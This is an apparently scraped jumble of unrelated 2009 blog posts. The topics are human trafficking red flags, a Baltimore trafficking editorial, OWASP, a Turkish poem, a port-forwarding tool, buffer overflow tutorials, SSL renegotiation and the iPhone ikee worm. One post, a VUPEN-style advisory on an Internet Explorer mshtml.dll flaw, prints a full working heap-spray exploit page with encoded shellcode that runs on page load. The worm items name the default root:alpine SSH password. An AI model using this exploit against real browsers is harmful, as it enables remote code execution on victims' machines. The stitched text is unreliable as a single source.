Shaniya Davis

I recently published a story on the Foreign Policy Association Blog Network, Trafficking? Not in my town…Yes, in every town, which featured the story of 5 year-old, Shaniya Davis, from Fayetteville, North Carolina. Shaniya was reportedly kidnapped and her body was later found on the side of a rural highway in North Carolina. Her mother was later charged with human trafficking for placing her daughter into ’sexual servitude’.

The story lead me an interview with Blog Talk Radio’s DC based show, “A Measure Of Truth”. I sat down with host, Michael Fordham to discuss some of the harsh realities of human trafficking/modern slavery and how it can effect every town, and we can all make an impact in helping to bring awareness to, and an end to, this horrendous crime against humanity. Click here for the recorded pod cast.

The case in NC has led many to seek to ask tough questions on whether this tragedy could have been prevented, however while the general issue of abuse has been addressed, few have touched on the realities of human trafficking. Out side of the human trafficking field few have questioned or mentioned the demand for sex, sex with a child, that factored into this story, which is haunting reality for many children across the globe. The demand for children that exists in Fayetteville, NC or, Washington, DC is the same demand that fuels sexual slavery in India, Thailand and beyond. This brings me back to an older article I published, Are we still clueless about modern slavery?. The hard truth is overall, yes! However we are progressing, we do have a long way to go. First steps are to educate yourself on what human trafficking is, then make yourself aware of the signs and how to report any suspected cases or potential victims.

What is Human Trafficking, or Modern Slavery? It is when the use of fraud, force, or coercion is used in which to exploit an individual for the mere means of profit or economic gains. There is no stereotypical face of human trafficking, for the chains of modern slavery can bind anyone, of any gender, race, religion or age. Those bound by slavery do not have to cross borders to be victimized, for one can be exploited within their own home, community, as well as half across the globe. Modern slavery comes in many shapes and forms, such as; child soldiers, forced labor through debt bondage, and forced prostitution or sex slavery. And as we have seen, not even rural North Carolina is immune to this disease of power and greed, which binds some 27 million people around the world.

It does happen right her in our nations capital, and not rarely. The Federal Bureau of Investigation (FBI) considers Washington, DC one of the top 14 sites in the country for sex trafficking of American children. (FBI, 2005). According to the Department of Justice (DOJ) Task Force members maintain that hundreds of sex and labor trafficking cases in the Washington, DC area remain undiscovered each year.

Anyone can become a victim; there isn’t one face to human trafficking and modern slavery. How do you know if you have come across a victim? The following is a list of potential red flags and indicators of human trafficking. If you see any of the following red flags, call the National Human Trafficking Resource Center hotline at 1-888-3737-888 now to report the situation.

• Is unpaid, paid very little, or paid only through tips

• Is not free to leave, or come and go

• Works excessively long and/or unusual hours , has no breaks or unusual restrictions at work

• Owes a large debt and is unable to pay it off

• Is under 18 and is providing commercial sex acts

• Was recruited through false promises concerning the nature and conditions of his/her work

• Is fearful, anxious, depressed, submissive, tense, or nervous / paranoid behavior

• Exhibits unusually fearful or anxious behavior after bringing up “law enforcement”

• Avoids eye contact

• Appears malnourished or is in poor physical health

• Shows signs of physical and/or sexual abuse

• Has little to no personal possessions

• Is not in control of his/her own money, no financial records, or bank account

• Has numerous inconsistencies in their story

Note: This list is not exhaustive and rather represents a selection of possible indicators and may not be present in all trafficking cases. Please see www.slaverystillexists.org for a more conclusive list

source: http://www.examiner.com/x-7661-DC-Human-Rights-Examiner~y2009m11d24-Facing-the-realities-of-human-trafficking-in-our-own-back-yard

A first release candidate for the OWASP Top 10 2010 was released a while ago. In my view the best enhancement is the new design of document.

As I worked on some short executive summaries for my company, I always struggled how to get a lot of information in the shortest form possible. The new OWASP Top10 PDF design is kind of perfect for this matter.

Document (Download as PDF):

Gene günlerden PAZARTESİ sıkıcı bir ders havası var okulumda her zaman kii gibi ekiyorum eve geliyorum .. Ne yapsam ne etsem diye düşünürken bir film izliyeyim dedim netten 2o12′ yi buldum dolmasını beklıyorum .  Yazmışım googleme ekşi sözlük diye girmişim ekşi sözlüğüme cirit atıyorum resmen sitede . Gözüme ” fbi ve cia ajanlarına kerhanede yumurtalı saldırı ” diye bişiy çarptı açtım meraklan okuyorum kii okuduğumun sonuna gelene kadar ağzım kulaklarıma vardı .. (: Sizlede paylaşmak istedim ..

A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the “getElementsByTagName()” method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.

VUPEN has confirmed the vulnerability on fully patched Windows XP SP3 systems with Internet Explorer 7 and 6.

Affected Products

Microsoft Internet Explorer 7
Microsoft Internet Explorer 6

Solution

Disable Active Scripting in the Internet and Local intranet security zones.

VUPEN Security is not aware of any vendor-supplied patch.

References

http://www.vupen.com/english/advisories/2009/3301

exploit code

<!–
securitylab.ir
K4mr4n_st@yahoo.com
–>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0×40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD>
<BODY onload="load()">
</BODY>
</HTML>

 

exploit source : http://downloads.securityfocus.com/vulnerabilities/exploits/37085.html

Dün youtube’de dolaşırken rastladığım müthiş bir şarkı . Dinlemenizi şiddetle tavsiye ederim .. Serdem Coşkun – Alçak

Youtubeye giremeyenler için www.ktunnel.com adresinden bağlana bilirler ..

Ben sana bok demem,

Boklar duyar ar eder.

Bir zerren düşse boka,

Onu da mundar eder.

Tanrı senin hamurunu

Necasetle yoğurmuş,

Anan seni s.ç.r iken

Yanlışlıkla doğurmuş.

Neyzen Tevfik

Size önereceğim bu program ile ki adı PFConfig modeminizin ayarlarını modem imalatçısı kadar bilmenize gerek kalmayacak, bu program sayesinde modeminiz ne olursa olsun istediğiniz program için istediğiniz portu açabileceksiniz.

Programın nasıl kullanıcılacağı ve download linki verdiğim sayfada bulunmakta. Programı kuruyorsunuz, ilk başta size iki soru soracak bunlardan birisi aşağıdaki şekilde gördüğünüz gibi modeminizin marka ve modeli.

İkinci olarak program modem ayarlarınıza ulaşmak için sizden modem ayar sayfasının ip numarasını[Genellikle |192.168.2.1| Ama Sizde Farklı Olabilir...], şifre ve kullanıcı adınızı isteyecek aşağıdaki şekildeki gibi.

Bunları yapmanızla birlikte artık modemde istediğiniz program için istediğiniz portu açabilirsiniz. Tek yapmanız gereken program listesinden mesela utorrenti seçmek ve forward this app seçeneğiniz seçmek. Artık modeminizde o program için port açmış durumdasınız.

İndirmek için tıkla

The team from Offensive Security have just announced the opening of explo.it (re-directs to exploits.offensive-security.com, just more memorable). The site is designed as a successor to milw0rm. If you’ve ever browsed the milw0rm site the layout will be instantly familiar.

I think this is great news for the infosec community, not only does the OffSec team always produce high quality output, but it helps provide some stability in the wake of milw0rms recent uncertainty.

At this point the site’s content volume is growing rapidly, when I looked this morning the archives exploits numbered around 9000, already it has reach 10000+, and a refresh of the front page has this number increase a good percentage of the time.

One feature of the site that I do like is a link (where available) to the vulnerable version of the application or code. I believe this will make testing much easier as it removes the need to trawl the web for an often unsupported and unavailable old version of an application. I really hope that this feature will become popular and all/most of the published exploits will link to a download location for retrieving the vulnerable code where possible.

Happy exploiting (in your lab, obviously)

– Andrew Waite

Hello all, after a while of not updating my blog, and switching blogs, I decided to finally make a new post after all.

This post will be a review on the video tutorial series “Buffer overflow primer” by Vivek Ramachandran.

Vivek Ramachandran is a security evangelist and has been working in computer security related fields for the past 7 years. In 2007, Vivek spoke at world renowned conferences Defcon (WEP Cloaking Exposed) and Toorcon (The Caffe Latte Attack). The discovery of the Caffe Latte Attack was covered by CBS5 news, BBC online, Network World etc news agencies.In 2006, Vivek was announced as one of winners of the Microsoft Security Shootout contest held in India among 65,000 participants. He has also been a recipient of a Team Achievement at Cisco Systems for his work on 802.1x and Port Security modules on the Catalyst 6500 switches. Currently he spends all of his time maintaining Security- Freak.Net , SecurityTube.Net and is the co-founder of Axonize. Vivek, is a Bachelor in Electronics and Communications Engineering from the prestigious Indian Institute of Technology, Guwahati.You can contact him at vivek[at]securitytube.net

So, to start off the review with a short description:

The Buffer Overflow Primer Series are a series of 9 video tutorials about buffer overflow. The author will take you through various slideshows and practical examples, including the code and a fully detailed explanation about what each function does.

Some things included in these tutorials are:

• analyzing the stack
• exploiting the stack
• converting complex c code to a simple assembly code
• creating shellcode from this assembly code
• using this shellcode to exploit a program

In other words, in just these 9 video tutorials, you will learn a lot. Even if you have no idea what buffer overflow is, the author explains everything step by step in the greatest detail I have ever seen.

The links to the different parts:

Part 1 (Smashing the stack)
Part 2 (Writing exit shellcode)
Part 3 (Executing shellcode)
Part 4 (Disassembling execve)
Part 5 (shellcode for execve)
Part 6 (exploiting a program)
Part 7 (exploiting a program: demonstration)
Part 8 (return to libc theory)
Part 9 (return to libc theory: demonstration)

I hope this has been helpful guys, don’t forget to follow me on twitter: http://twitter.com/raykoid666

-Raykoid666

Capitalism is the exploitation of one man by another; socialism is the reverse.

Anonymous

On 11/05/09 the notice of Renegotiation vulnerabilities within SSL/TLS protocols became public.  The vulnerability allows for injection of arbitrary plain-text allowing for HTTP requests, or impersonate the victim, as well as other consequences.

~Opinion~

While the known possible outcomes of this vulnerability seem similar to many of the run-of-the-mill exploits we’ve seen, the ramifications behind this vulnerability are monumental.

Just the number of vendors, and their products effected by this alone show that there will soon be a revolution.  The affect on everyday lives of so many will undoubtedly negative.

Either a major overhaul of the protocols is necessary, or we are in for a new breed of security focus.  An overhaul is most likely to occur; however, if it doesn’t we will have to be prepared to move into a security stance which covers security in both a pre- and post- environment.

Our previously hardened infrastructure would have to be analyzed, and protected during use.  Protecting our protection if you will.

While all this seems goofy, given the fact that we will most likely just patch and move on, it seems to beckon the time for more intuitive security measures is nearing, or hear.  Security measures that… think.

Packets with guns.  Headers with secret handshakes. Connections that conspire against their own existence.

~/Opinion~

As usual, if you want to hear more information, visit the link below… And I am very interested in hearing comments on this one… Maybe I am just blowing it out of proportion, but it seems big.

Vulnerability Note VU#120541 (New Window)

Super Power Exploiter
Genesis Distiction Chariot
Chariots Without Rival

Submitted by: dunno source via Engrish Funny Submissions

Our view: Shoddy police work sank the pandering case against Carlos Silot, but even had he been convicted, Maryland’s laws aren’t tough enough on adult sex traffickers

The case against Carlos Silot, whom police last year accused of running a brothel near Patterson Park, seemed clear cut. Officers put his rented rowhouse under surveillance, then watched as more than a dozen men entered and left over a span of hours. When detectives searched the house they found lists of customers, condoms, photographs, money, business cards and two women from Mexico who said Mr. Silot brought them there to have sex with customers. They were arrested for prostitution, and Mr. Silot was charged with “pandering” – a misdemeanor offense.

Still, on paper, the case looked like a slam-dunk for the prosecution. Yet it fell apart this week, and for an all-too-predictable reason: The women refused to testify against him. In fact, they were nowhere to be found.

How could anyone have expected otherwise? The women were illegal immigrants who had been cut off from their families and made to endure countless deprivations. Last April, when their case first came to trial, their lawyer claimed they were tricked into coming here and that they were held as virtual captives in the Patterson Park house. They couldn’t possibly expect that testifying against the man they say was responsible would turn out well, especially after learning that the state’s case against Mr. Silot was already shaky because police had mishandled or lost key pieces of evidence against him.

What assurances could the Baltimore state’s attorney’s office have made that it would protect these women? It can’t have helped that prosecutors initially charged them with prostitution – even though they were the victims.

In recent years, federal prosecutors have had notable success prosecuting sex-traffickers who exploit women and girls through force, fraud or coercion. The U.S. attorney’s office can bring to bear more resources than local authorities to investigate alleged crimes. Federal laws for such crimes are much stricter, and the federal government can provide legal status for sex-trafficking victims and help them rebuild their lives.

But the feds can’t handle every sex-trafficking case that comes up, which is why local prosecutors took the lead on Mr. Silot’s case. And the outcome points up not only the police’s bungling of the evidence needed to secure a conviction but also the clumsy way officials responded to the victims of sex-trafficking, as well as the disparity in penalties for traffickers who exploit children versus those whose victims are adults.

Since 2007, child sex trafficking has been a felony punishable by up to 25 years in prison in Maryland. But state law still treats trafficking in adult women as a misdemeanor; even if Mr. Silot had been convicted of pandering, he would have served no more than 10 years.

Not every case of pandering involves force, fraud or coercion, but for those that do, the penalty for adult and child sex-trafficking shouldn’t be so disparate.

Moreover, police need better training to recognize the signs of sex-trafficking and to protect its victims rather than treat them as criminals. They should know when to call in specialized investigative units and how to put victims in touch with nonprofit groups that offer counseling and other services. It’s a lot easier to slap a prostitution charge on a frightened woman who may not speak English well or even know the name of the city where she has been brought than it is to put her pimp behind bars. But that’s too often the way sex-trafficking cases are treated, and it needs to change.

Readers respond
The news that a credible sex trafficking case “fell apart” due to a lack of testimony from two victims is unsurprising at best. Both foreign national and U.S. citizen victims of sex and labor trafficking face enormous obstacles as they attempt to leave (or simply survive) unimaginable, often terrifying circumstances.

However, rather than cast blame on prosecutors, it is more productive to understand that in Maryland, local, state and federal law enforcement officers; advocates; and legislative experts have formed the Maryland Human Trafficking Task Force to assist victims and ensure justice, including successful prosecution. This body is able to serve victims and get the word out about the scourge of sex and labor trafficking in Maryland.

Let’s put aside our differences and focus on the real enemy – male and female traffickers, from this country and elsewhere, who ruthlessly exploit child, teen and adult victims – and on real solutions, which always involve working together as one.

source: http://www.baltimoresun.com/news/opinion/editorial/bal-ed.sextrafficking11nov11,0,4383283.story

The first iPhone worm has been discovered. It comes to us via Australia, and appears to be limited to that country for now, although it has the potential to spread. It also stars Rick Astley, so to speak. The work changes the iPhone’s wallpaper to an image of the 1980s pop singer, who’s enjoyed a recent resurgence thanks to the Rick-rolling Internet phenomenon.

The worm has the ability to break into jailbroken iPhones only. Even if you’ve jailbroken, you still aren’t vulnerable unless you’ve also installed SSH, and not changed the default password after doing so. As a result, only a small fraction of the larger iPhone community is probably susceptible to the “ikee virus,” as it is called in its own source code.

Still, it shows that as the platform matures and becomes more widespread, it also becomes the target of more malicious attacks. Most hackers, like any businesspeople, are interested in the bottom line, and part of that involves targeting the largest group of people possible. With millions of users worldwide, the iPhone is definitely an appealing mark. ikee’s creator, a hacker calling himself “ikex,” cites a different explanation for this particular worm’s creation:

Why?: Boredom, because i found it so stupid the fact that on my initial scan of my 3G optus range i found 27 hosts running SSH daemons, i could access 26 of them with root:alpine. Doesn’t anyone RTFM anymore?

In the case of this worm, which only changes the background wallpaper to the Astley photo with the slogan, “ikee is never going to give you up” across the top, Graham Cluley of SophosLabs suggests it’s really only an experiment:

The source code is littered with comments from the author suggesting the worm has been written as an experiment. One of the comments berates affected users for not following instructions when installing SSH, because if they had changed the default password the worm would not have been able to infect them.

While not dangerous in and of itself (it actually sort of provides a service by reminding users to take precautions), it could open the door for similar programs with less innocuous payloads. Hopefully, jailbreak users will learn from the experience and be prepared if someone more sinister tries to do the same thing again.

It’ll be interesting to see whether Apple (s aapl) latches onto this as a means to further decry the evils of jailbreak. If it leads to more serious exploits, it definitely would constitute a good reason to stay on the straight and narrow. In either case, expect to see more security concerns surrounding the iPhone as it continues its commercial success.

E’ stata appena scoperta (ieri 08-11-09) una nuova vulnerabilità su Internet Explorer, il famoso browser di casa Microsoft.

Si tratta di un Denial of Service.

Praticamente visitando una pagina appositamente modificata farebbe bloccare il browser rendendolo impossibile da chiudere se non da TaskManager.

L’autore MustLive ha già informato la Microsoft.

Le versioni di IE affette sono le seguenti:

Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.0.6000.16711) and previous versions (and possible next versions too).

Se volete vedere gli effetti dell’exploit andate quì (non è pericoloso per la sicurezza, il browser si bloccherà solamente e dovrà essere terminato).

Saluti.

Torna alla HomePage

]]> http://encourager.wordpress.com/2009/11/09/first-iphone-worm-targets-jailbroken-iphones-warning/ Mon, 09 Nov 2009 13:27:54 +0000 encourager http://encourager.wordpress.com/2009/11/09/first-iphone-worm-targets-jailbroken-iphones-warning/

November 8th, 2009 | by Pete Cashmore

If you’ve got a jailbroken iPhone, listen up: a worm is reported to have broken out in Australia that targets owners who have not changed the default password after installing SSH.

The worm’s behavior is somewhat amusing: it changes your background to a photo of Rick Astley, then looks for other phones on the network to infect. That said, the exploit could easily be used by hackers with malicious intent for more nefarious purposes.

If you have a jailbroken iPhone and you’ve installed SSH without changing the default password (from “alpine”) you need to do so to avoid such attacks. If you have not jailbroken your iPhone or iPod Touch and installed SSH, you are not affected.

Sophos writes of the exploit:

SophosLabs is analysing the worm’s code, which suggests that at least four variants have been written so far. One of the attributes of the latest variant (labelled the “D” version) is that it tries to hide its presence by using a filepath suggestive of the Cydia application.

The source code is littered with comments from the author suggesting the worm has been written as an experiment. One of the comments berates affected users for not following instructions when installing SSH, because if they had changed the default password the worm would not have been able to infect them.

You have been warned!
via mashable.com